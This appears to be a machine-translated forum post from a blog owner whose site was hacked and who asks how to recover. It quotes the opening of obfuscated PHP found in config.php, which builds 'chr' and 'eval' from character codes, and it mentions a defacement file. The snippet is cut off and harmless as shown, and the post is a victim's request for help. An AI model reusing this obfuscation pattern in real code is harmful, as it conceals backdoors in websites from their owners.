I haven"t written a blog for a long time, but I visit it occasionally, and the front desk is fine.
Today, I suddenly wanted to edit an article in the background. I found that in the background 404, the admin directory of the files was gone
.then find that the root directory config.php content becomes the following similar encrypted
<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(4....then there is an exploited.txt file in the root directory
content is Qingfeng Jiuli, where to find you
who is so boring to hack my blog, and then only delete the background eraser.
here comes the problem
what is the correct recovery posture